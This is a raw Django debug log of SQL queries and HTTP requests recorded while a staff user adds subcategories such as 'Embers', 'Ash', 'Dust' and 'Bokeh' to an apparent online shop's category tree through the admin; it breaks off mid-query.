139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:13:46] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:14:00,832 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:14:00.820066+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 14, 0, 820066, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:14:00,836 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:14:00,844 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-13 13:14:00,849 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 7 LIMIT 1; args=(7,) DEBUG 2019-12-13 13:14:00,852 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 7 AND "shop_category"."slug" = 'embers') LIMIT 1; args=(7, 'embers') DEBUG 2019-12-13 13:14:00,854 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Embers' LIMIT 1; args=('Embers',) DEBUG 2019-12-13 13:14:00,860 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Embers' AND "shop_category"."parent_id" = 7) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Embers', 7) DEBUG 2019-12-13 13:14:00,862 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-13 13:14:00,864 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 5 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 5, 1, 1] DEBUG 2019-12-13 13:14:00,868 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Embers', 7, 'categories/2019/12/13/collection7_ZCM4YHI.png', 'Embers', false, 'embers', 2, 3, 5, 1) RETURNING "shop_category"."id"; args=('Embers', 7, 'categories/2019/12/13/collection7_ZCM4YHI.png', 'Embers', False, 'embers', 2, 3, 5, 1) DEBUG 2019-12-13 13:14:00,870 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:14:00.868765+00:00'::timestamptz, 6, 8, '36', 'Embers', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 14, 0, 868765, tzinfo=), 6, 8, '36', 'Embers', 1, '[{"added": {}}]') [13/Dec/2019 13:14:00] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:14:01,170 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:14:01.160640+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 14, 1, 160640, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:14:01,173 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:14:01,227 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:14:01,292 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:14:01.289630+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 14, 1, 289630, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:14:01] "GET /shop/category/add/ HTTP/1.0" 200 8891 DEBUG 2019-12-13 13:14:01,632 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:14:01.619616+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 14, 1, 619616, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:14:01,636 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:14:01] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:14:18,283 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:14:18.264183+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 14, 18, 264183, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:14:18,291 utils 11259 139831317362432 (0.004) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:14:18,314 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-13 13:14:18,325 utils 11259 139831317362432 (0.005) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 7 LIMIT 1; args=(7,) DEBUG 2019-12-13 13:14:18,336 utils 11259 139831317362432 (0.008) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 7 AND "shop_category"."slug" = 'ash') LIMIT 1; args=(7, 'ash') DEBUG 2019-12-13 13:14:18,339 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Ash' LIMIT 1; args=('Ash',) DEBUG 2019-12-13 13:14:18,349 utils 11259 139831317362432 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Ash' AND "shop_category"."parent_id" = 7) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Ash', 7) DEBUG 2019-12-13 13:14:18,359 utils 11259 139831317362432 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-13 13:14:18,362 utils 11259 139831317362432 (0.002) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 5 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 5, 1, 1] DEBUG 2019-12-13 13:14:18,371 utils 11259 139831317362432 (0.005) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Ash', 7, 'categories/2019/12/13/collection7_sU2pbFG.png', 'Ash', false, 'ash', 2, 3, 5, 1) RETURNING "shop_category"."id"; args=('Ash', 7, 'categories/2019/12/13/collection7_sU2pbFG.png', 'Ash', False, 'ash', 2, 3, 5, 1) DEBUG 2019-12-13 13:14:18,377 utils 11259 139831317362432 (0.004) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:14:18.372142+00:00'::timestamptz, 6, 8, '37', 'Ash', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 14, 18, 372142, tzinfo=), 6, 8, '37', 'Ash', 1, '[{"added": {}}]') [13/Dec/2019 13:14:18] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:14:18,690 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:14:18.676376+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 14, 18, 676376, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:14:18,695 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:14:18,786 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:14:18,873 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:14:18.870751+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 14, 18, 870751, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:14:18] "GET /shop/category/add/ HTTP/1.0" 200 8927 DEBUG 2019-12-13 13:14:19,222 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:14:19.208556+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 14, 19, 208556, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:14:19,227 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:14:19] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:14:45,293 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:14:45.280120+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 14, 45, 280120, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:14:45,298 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:14:45,309 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-13 13:14:45,316 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 7 LIMIT 1; args=(7,) DEBUG 2019-12-13 13:14:45,320 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 7 AND "shop_category"."slug" = 'dust') LIMIT 1; args=(7, 'dust') DEBUG 2019-12-13 13:14:45,322 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Dust' LIMIT 1; args=('Dust',) DEBUG 2019-12-13 13:14:45,326 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Dust' AND "shop_category"."parent_id" = 7) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Dust', 7) DEBUG 2019-12-13 13:14:45,330 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-13 13:14:45,333 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 3 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 3 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 5 AND ("lft" > 3 OR "rght" > 3); args=[3, 2, 3, 2, 5, 3, 3] DEBUG 2019-12-13 13:14:45,337 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Dust', 7, 'categories/2019/12/13/collection7_zgKzb94.png', 'Dust', false, 'dust', 4, 5, 5, 1) RETURNING "shop_category"."id"; args=('Dust', 7, 'categories/2019/12/13/collection7_zgKzb94.png', 'Dust', False, 'dust', 4, 5, 5, 1) DEBUG 2019-12-13 13:14:45,340 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:14:45.338667+00:00'::timestamptz, 6, 8, '38', 'Dust', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 14, 45, 338667, tzinfo=), 6, 8, '38', 'Dust', 1, '[{"added": {}}]') [13/Dec/2019 13:14:45] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:14:45,686 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:14:45.675374+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 14, 45, 675374, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:14:45,690 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:14:45,745 utils 11259 139831317362432 (0.004) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:14:45,811 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:14:45.808246+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 14, 45, 808246, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:14:45] "GET /shop/category/add/ HTTP/1.0" 200 8968 DEBUG 2019-12-13 13:14:46,156 utils 11259 139831317362432 (0.007) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:14:46.138899+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 14, 46, 138899, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:14:46,160 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:14:46] "GET /jsi18n/ HTTP/1.0" 200 3223 [13/Dec/2019 13:14:47] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 13:15:02,050 utils 11259 139831317362432 (0.008) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:15:02.029040+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 15, 2, 29040, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:15:02,055 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:15:02,066 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-13 13:15:02,073 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 7 LIMIT 1; args=(7,) DEBUG 2019-12-13 13:15:02,077 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 7 AND "shop_category"."slug" = 'bokeh') LIMIT 1; args=(7, 'bokeh') DEBUG 2019-12-13 13:15:02,083 utils 11259 139831317362432 (0.004) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Bokeh' LIMIT 1; args=('Bokeh',) DEBUG 2019-12-13 13:15:02,094 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Bokeh' AND "shop_category"."parent_id" = 7) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Bokeh', 7) DEBUG 2019-12-13 13:15:02,097 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 7; args=(7,) DEBUG 2019-12-13 13:15:02,099 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 3 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 3 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 5 AND ("lft" > 3 OR "rght" > 3); args=[3, 2, 3, 2, 5, 3, 3] DEBUG 2019-12-13 13:15:02,104 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Bokeh', 7, 'categories/2019/12/13/collection7_s1gVgUK.png', 'Bokeh', false, 'bokeh', 4, 5, 5, 1) RETURNING "shop_category"."id"; args=('Bokeh', 7, 'categories/2019/12/13/collection7_s1gVgUK.png', 'Bokeh', False, 'bokeh', 4, 5, 5, 1) DEBUG 2019-12-13 13:15:02,107 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:15:02.105323+00:00'::timestamptz, 6, 8, '39', 'Bokeh', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 15, 2, 105323, tzinfo=), 6, 8, '39', 'Bokeh', 1, '[{"added": {}}]') [13/Dec/2019 13:15:02] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:15:02,412 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:15:02.398500+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 15, 2, 398500, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:15:02,418 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:15:02,502 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:15:02,581 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 